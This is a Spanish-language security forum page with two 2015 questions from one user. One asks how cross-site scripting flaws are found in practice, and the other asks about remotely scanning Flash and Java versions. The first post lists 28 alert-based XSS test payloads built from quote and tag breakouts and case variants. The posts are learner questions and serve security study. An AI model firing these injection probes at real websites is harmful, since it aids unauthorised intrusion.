elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Nivel Web / La única forma de encontrar XSS es probando ataques aleatorios? en: 17 Diciembre 2015, 07:05 am
Buenas! Hay una duda que siempre tuve desde que arranque a leer artículos sobre XSS, todos muy informativos lo que quieran, pero en ningúno encontré explicaciones para saber como localizarlos... Es decir, hasta donde yo se el ataque XSS depende por completo de la parte PHP que se ejecuta en el servidor, si de alguna manera se pudiera leer el PHP que se ejecuta en el server, sería facil de saber como escaparse de los bloques.... Pero... En la vida real, qué tecnicas usan para encontrarlo? Hasta ahora la única forma que se es probando muchos ataques aleatoriamente como pueden ser éstos:

Código
  1. "><script>alert("XSS")</script>
  2. "><script>alert(String.fromCharCode(88,83,83))</script>
  3. '><script>alert("XSS")</script>
  4. '><script>alert(String.fromCharCode(88,83,83))</script>
  5. <ScRIPt>aLeRT("XSS")</ScRIPt>
  6. <ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
  7. "><ScRIPt>aLeRT("XSS")</ScRIPt>
  8. "><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
  9. '><ScRIPt>aLeRT("XSS")</ScRIPt>
  10. '><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
  11. </script><script>alert("XSS")</script>
  12. </script><script>alert(String.fromCharCode(88,83,83))</script>
  13. "/><script>alert("XSS")</script>
  14. "/><script>alert(String.fromCharCode(88,83,83))</script>
  15. '/><script>alert("XSS")</script>
  16. '/><script>alert(String.fromCharCode(88,83,83))</script>
  17. </SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
  18. </SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
  19. </SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
  20. </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  21. ";alert("XSS");"
  22. ";alert(String.fromCharCode(88,83,83));"
  23. ';alert("XSS");'
  24. ';alert(String.fromCharCode(88,83,83));'
  25. ";alert("XSS")
  26. ";alert(String.fromCharCode(88,83,83))
  27. ';alert("XSS")
  28. ';alert(String.fromCharCode(88,83,83))

O usando algún programa que pruebe éstos ataques aleatoriamente por uno, como ser el XXSer por ejemplo.... Me gustaría que me dijeran qué técnicas usan ustedes para encontrarlos, si hay alguna forma más "inteligente" que simplemente probando ataques aleatoriamente... Y de paso si tienen algún pdf o cualquier clase de material que me ayuda a entender ésto y pueden aportarlo, sería muuuy bienvenido... Saludos y muchas gracias desde ya!
2  Seguridad Informática / Seguridad / Se puede escanear versiones de flash o java en una pc remota? en: 14 Diciembre 2015, 00:31 am
Buenas! Mi duda era esa, si existe alguna forma de escanear las versiones, o directamente las vulnereabildidades que tenga flash y java. Con Nessus y nmap con vulscan me parece que no se puede obtener esa clase de información, si estoy equivocado me gustaría que me lo hicieran saber! Gracias por la ayuda y salu2
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines